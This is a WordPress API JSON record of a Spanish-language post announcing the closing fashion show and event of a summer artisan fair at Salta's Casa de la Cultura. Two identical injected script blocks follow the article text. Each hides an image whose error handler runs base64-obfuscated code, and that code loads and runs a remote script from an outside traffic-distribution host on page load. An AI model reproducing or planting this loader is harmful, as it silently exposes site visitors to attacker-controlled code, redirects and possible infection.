{"id":3695,"date":"2024-02-14T18:37:18","date_gmt":"2024-02-14T21:37:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3695"},"modified":"2025-08-14T00:00:35","modified_gmt":"2025-08-14T03:00:35","slug":"cierre-de-la-feria-verano-artesanal","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3695","title":{"rendered":"Cierre de la Feria Verano Artesanal"},"content":{"rendered":"\n<p class=\"has-white-color has-text-color has-background has-link-color wp-elements-b8889f5ce635bf8e5a19b5e4dbb4d2d2\" style=\"background-color:#820649e8\"><em><strong>Ma\u00f1ana 15 de febrero a las 20:30 horas en el hall de la Casa de la Cultura, artesanos del Mercado Artesanal de Salta pondr\u00e1n fin a la feria con desfile textil y de accesorios artesanales, show en vivo y degustaci\u00f3n. Entrada gratuita.<\/strong><\/em><\/p>\n\n\n\n<p>En el marco del ciclo Vacaciones en Cultura, artesanos de las diferentes Asociaciones del Mercado Artesanal llevaron a cabo la Feria Verano Artesanal, donde exhibieron y pusieron a la venta, durante un mes, artesan\u00edas aut\u00e9nticas de diferentes rubros, como cer\u00e1mica, textil, alpaca, asta, fieltro, chan\u00e9, madera, gastronom\u00eda regional, entre otros.<\/p>\n\n\n\n<p>Para cerrar presentar\u00e1n el desfile \u201cHerencia Ancestral\u201d, donde la artesana Patricia Vilte desplegar\u00e1 la colecci\u00f3n de su marca registrada Flor Silvestre con textiles tejidos en telar con lana de oveja y llama; dise\u00f1o de autor; dise\u00f1os art\u00edsticos de pasarela y se incluir\u00e1n accesorios de alpaca, asta y chaguar.<\/p>\n\n\n\n<p>El mismo tendr\u00e1 lugar el jueves 15 de febrero a las 20:30 horas en el hall de la Casa de la Cultura, Caseros 460, con entrada gratuita.<\/p>\n\n\n\n<p>Le pondr\u00e1 ritmo a la noche la artista folcl\u00f3rica Mirka Asiri y Finca Magnolia acompa\u00f1ar\u00e1 el evento con vinos y dulces. &nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/cierre-de-la-feria-verano-artesanal-94187\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana 15 de febrero a las 20:30 horas en el hall de la Casa de la Cultura, artesanos del Mercado Artesanal de Salta pondr\u00e1n fin a la feria con desfile textil y de accesorios artesanales, show en vivo y degustaci\u00f3n. Entrada gratuita. En el marco del ciclo Vacaciones en Cultura, artesanos de las diferentes Asociaciones [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3696,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-3695","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3695"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3695"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3695\/revisions"}],"predecessor-version":[{"id":6852,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3695\/revisions\/6852"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3696"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3695"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3695"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3695"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}